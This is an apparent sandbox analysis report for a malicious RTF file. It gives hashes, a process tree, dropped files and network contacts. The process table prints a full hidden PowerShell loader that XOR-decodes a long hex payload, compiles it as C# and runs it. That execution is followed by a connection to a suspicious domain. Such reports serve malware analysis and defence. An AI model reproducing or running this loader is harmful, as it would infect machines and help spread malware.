File name: | 39fd8035612444c36bd6a11ab6ff36c60acac65cc1ffe60cb4f7a6020253ecac.doc |
Full analysis: | https://app.any.run/tasks/1762d035-3de7-4a5a-9cef-7f5c3bdfce64 |
Verdict: | Malicious activity |
Analysis date: | August 26, 2019, 04:04:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 92AC2B428E09ED417D6E11A42887B695 |
SHA1: | 9817B4B635BE87E0CCE90B3011F4A775B1B63EBC |
SHA256: | 39FD8035612444C36BD6A11AB6FF36C60ACAC65CC1FFE60CB4F7A6020253ECAC |
SSDEEP: | 3072:oHghRNlzjmhRNlzjmhRNlzjmhRNlzjmhRNlzjRS:9RPzj6RPzj6RPzj6RPzj6RPzjRS |
.rtf | | | Rich Text Format (100) |
---|
Author: | Admin |
LastModifiedBy: | Admin |
CreateDate: | 2019:01:07 23:54:00 |
ModifyDate: | 2019:01:07 23:54:00 |
RevisionNumber: | 1 |
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 4 |
CharactersWithSpaces: | 4 |
InternalVersionNumber: | 57435 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\39fd8035612444c36bd6a11ab6ff36c60acac65cc1ffe60cb4f7a6020253ecac.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2520 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2400 | powershell -WindowStyle Hidden function me51579 { param($waf23) $sa72846 = 'k283f';$baeac74 = ''; for ($i = 0; $i -lt $waf23.length; $i+=2) { $he857 = [convert]::ToByte($waf23.Substring($i, 2), 16); $baeac74 += [char]($he857 -bxor $sa72846[($i / 2) % $sa72846.length]); } return $baeac74; } $t317c = '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'; $t317c2 = me51579($t317c); Add-Type -TypeDefinition $t317c2; [v983bc]::baa11e(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3928 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2268 | powershell -WindowStyle Hidden function me51579 { param($waf23) $sa72846 = 'k283f';$baeac74 = ''; for ($i = 0; $i -lt $waf23.length; $i+=2) { $he857 = [convert]::ToByte($waf23.Substring($i, 2), 16); $baeac74 += [char]($he857 -bxor $sa72846[($i / 2) % $sa72846.length]); } return $baeac74; } $t317c = '1e41515d014b614140120e5f034615025c5f133512414c560b45604d5d12025f5d1d2f05465d41091b615d411002515d405d1e41515d014b614140120e5f16770f0a55565c151f5b5b405d1e41515d014b614140120e5f167a2950474b5a080c126b4a151f57551d280e46033e6c1b475a5f0f08125b5f07184118455f53015a501d3076545f2f064257411243105356140557540054491e7d5d12194b685c0f05460511210e4668410908735c57140e414b114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618575e05040d1a715d123b464a1312535409015347414c410f05551855030a0a011a5d3076545f2f064257411243105356140557540054491e1876081f40416309025c4c135b4b10745c070f7e5151140a4041114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618015b555e520a104012195b5654460f030c0202420963770a077b554309194610110d0e4056560a58001a1f462e5c4c411f3b5d515d1256106e5a141f47595f36195d4c56051f10116e461b475a5f0f08124b47071f5b5b130313465d41084b50575c0a4b580a055e0854107a081f624c41460d070e52514767715d123b464a130752075e024a4b47515d124b57590b5e53000e1f4604474c1313025c4c131c5d570056070a1b036822075e715e1604404c1b4420574a5d0307010a1d02075e1a1f462e5c4c411f3b5d515d1256106a470a265d4e562b0e5f57411f491e1860031f7e5940122e404a5c145654595f150e1b6513151f534c5a054b57404703195c18450902561857055e04010b4e225c4c631219124e51525301001f2f05466847144b570f0b550d1e515d124b550a045e5350011a5d1b475a5f0f08124b47071f5b5b130f05461851070a0309564e4249715d123b464a13040e040e57555f1205131558515e0b5f531a5556535a070f0a4e49025906005f500d525253025e06035e061a1a4f505b5e1b040e040e57555f0f057a081f624c414831574a5c4f10555747094b575a55020f505d081b225c4c6312191248500252030e525b18575e05040d1a5a56505d560b074a06570d02535c0b1011540a075e07045e530b065653070b06505c030900560f070c06025f031a1a4f505b5e1b1608560102500a0f057a081f624c414831
574a5c4f10555747094b575a55020f505d081b3e7b5647361f4018555508065e565b4367715d123b464a1a535047515d124b5e000651520305035d025410120c590400500043425b575f5a04591f0058510c55034702400756475d4d4746070a0d045f5a1b114801044657130309545c57040e0945711f1f57636e460e0301025e5649084b555a1e084b000d1e084b5f5b4f037a081f624c41461b040a075e5c0f755214185a595f482a5e545c052375545c040a5e10004f507f5941150353541d250442411b035a0b090b4a5b1e4805545f0a0f1f5542095c50535d0b001b080e45187a081f624c414e1b515c0a575d53166709225c4c0552431b13031e5b0209514f47420e0152530514004f50575a55020f505d09463c575a700a02575647461b060057500d05055d031c126f5604285e5156081f1a1108151f40515d014b515901540e510576081d5b4a5c0806575647482c574c750907565d41360a46501b230544514109055f5d5d124561485605025354750907565d41482a42485f0f08534c5a09057659470742191a6f3a0c005d040453001a180b0e07090651521a1a07535e050c03535d101108165f0a5c05005c1c7c5c11055e5752022d5b54564e06570d02535c0b10115658060e07055f010906535a035c02515e0708555758060906565e53080b560e075d06525e020c0b5653075c06535a510d045608050804035e530955565d060b03045b050907540d065905025e510c0b560e06590602491b14500759005d504f50624a5c050e414b60120a404c7a080d5d1854020f055a505b05574f1336195d5b561518614c52141f7b56550943515901540e51110836195d5b5615181c6b470719461054020f055a504f50405d4713195c18035d16424d510a02511840120a4651504618464a5a080c125556535a070f0a4e18464a5a080c12400a5e0d011148151f40515d014b46005557590705110d590a0b554450414c410f05551840550854000a5e56614c410f055516760b1b464108000440105a081f12510e56505b044b5f53540b1d2a0e5c5f470e505b130e5442495a4a120e124b56005d505e0e25045c4e56141f1c6c5c2412465d1b1e520a5e004838475a4012195b56544e021e0a1a4a5a0411081558515e0b5f5319051b0503534a1a4e18575e05040d126613125354090153301a511c5442121d13125354090153457e5d5d011f5a651a5d16405d4713195c1840550854000a5e504f45'; $t317c2 = me51579($t317c); Add-Type -TypeDefinition $t317c2; [v983bc]::baa11e(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2392 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\zmtnevhr.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3280 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2264 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAF70.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAF6F.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3708 | powershell -WindowStyle Hidden function me51579 { param($waf23) $sa72846 = 'k283f';$baeac74 = ''; for ($i = 0; $i -lt $waf23.length; $i+=2) { $he857 = [convert]::ToByte($waf23.Substring($i, 2), 16); $baeac74 += [char]($he857 -bxor $sa72846[($i / 2) % $sa72846.length]); } return $baeac74; } $t317c = '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'; $t317c2 = me51579($t317c); Add-Type -TypeDefinition $t317c2; [v983bc]::baa11e(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2688 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9C73.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2520 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA4A1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB77.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2400 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q77E59K726ZWMIUZBPK4.temp | — | |
MD5:— | SHA256:— | |||
3280 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAEC3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2264 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESAF70.tmp | — | |
MD5:— | SHA256:— | |||
2392 | csc.exe | C:\Users\admin\AppData\Local\Temp\zmtnevhr.dll | — | |
MD5:— | SHA256:— | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NGTGTBAFI5SRU36OWHHQ.temp | — | |
MD5:— | SHA256:— | |||
2392 | csc.exe | C:\Users\admin\AppData\Local\Temp\zmtnevhr.out | — | |
MD5:— | SHA256:— | |||
2688 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB28C.tmp.cvr | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | powershell.exe | 50.87.151.158:443 | fixshinellc.com | Unified Layer | US | suspicious |
Domain | IP | Reputation |
---|---|---|
fixshinellc.com | | suspicious |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 <br> *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |